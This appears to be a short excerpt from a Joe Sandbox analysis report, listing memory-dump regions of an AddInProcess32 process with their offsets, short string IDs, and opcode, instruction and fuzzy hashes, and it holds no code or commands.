                          • Source File: 0000000E.00000002.619064038.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_720000_AddInProcess32.jbxd
                          Similarity
                          • API ID:
                          • String ID: $p$$p$$p$$p$$p$$p$$p$$p$$p$$p
                          • API String ID: 0-1868313790
                          • Opcode ID: e651a1bab53746eb19fd6143c17e445836b0d595ac057878fc83599e6b4b9ced
                          • Instruction ID: b89aaa00455e82ad846ef1922179f2486ce3836f4cae2debe895cea083ffcf47
                          • Opcode Fuzzy Hash: e651a1bab53746eb19fd6143c17e445836b0d595ac057878fc83599e6b4b9ced
                          • Instruction Fuzzy Hash: DB124D35A00229CFDB28DF68D854BAEB7F2BF95300F64856AD409AB355DB34DD81CB90
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.619064038.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_720000_AddInProcess32.jbxd
                          Similarity
                          • API ID:
                          • String ID: $p$$p$$p$$p
                          • API String ID: 0-3121760203
                          • Opcode ID: a08d0ed8ccfbc9a88a8ae2d36058605a00a9b34a0ebc68061cd951ec5f57e225
                          • Instruction ID: e3395d108e23a8bbe630ffd6e765596407d1dcc7adadbd0d10c4106a39e5da75
                          • Opcode Fuzzy Hash: a08d0ed8ccfbc9a88a8ae2d36058605a00a9b34a0ebc68061cd951ec5f57e225
                          • Instruction Fuzzy Hash: 95B14F30A00214DFCB29EF64E5957AEB7B2EF84300F648869D405EB356DB79DD82CB80
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.619064038.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_720000_AddInProcess32.jbxd
                          Similarity
                          • API ID:
                          • String ID: LRp$LRp$$p$$p
                          • API String ID: 0-727438728
                          • Opcode ID: 25b8aee5c34957ba64c20592da386d1337e19ff339233fd7ba5fde267bc455ce
                          • Instruction ID: 3b027e0c8d9a9f50087da25221e36f0f93bd53cb7dced48d25be7d2918509026
                          • Opcode Fuzzy Hash: 25b8aee5c34957ba64c20592da386d1337e19ff339233fd7ba5fde267bc455ce
                          • Instruction Fuzzy Hash: 20516F31B00211AFCB18EF68E481A6EB7E2EF89300F148569E455AF366DB35EC45CB50